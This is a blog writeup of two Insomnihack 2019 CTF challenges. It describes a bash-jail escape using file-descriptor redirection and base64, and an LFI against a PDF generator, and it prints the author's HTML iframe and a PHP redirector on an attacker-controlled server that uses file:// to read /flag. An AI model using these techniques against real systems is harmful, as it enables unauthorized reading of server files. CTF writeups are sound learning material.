Saturday, March 23, 2019

[Writeup] Insomnihack final 2019

myBrokenBash

For this challenge, the author give us something about stdout and when I try to send something the server will reply the string that I send, it's make me remember to a challenge in Ringzer0 CTF about bash shell jail escaping. It use file description to bypass stdout. Redirect from stdout to stdin by ls * 1>&0 I can see the flag file.


But I got the problem when I try to cat a flag, I only have a half flag



Maybe another file contain another half flag but the grep command only direct me to that file, so I think it have been filtered output. After a little help form my mates, I used base64 command and got a flag.


Flag: INS{c@t_th3_Flag_1t_s_n0t_so_ea4y}

EZGEN

I write this writeup base on my mate solution, I just help him found flag's direction because I found it at mybashbroken. This challenge have problem is LFI and he wrote a code on his vps to get flag. The code below is just a old version because he reset windows after competion end so I can't have best code for you.

index.html


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title></title>
  <link rel="stylesheet" href="">
</head>
<body>
  <iframe width="800" height="800" src="http://<IP_YOUR_SERVER>/file.php?file=/var/www/html/webtopdf.php"></iframe>
</body>
</html>

file.php


1
2
3
4
<?php
$filename = $_GET['file'];
header("Location: file://$filename");
?>

The flag saved at /flag
(This is my first test, correct is /flag not flag)
And I got flag


0 comments:

Post a Comment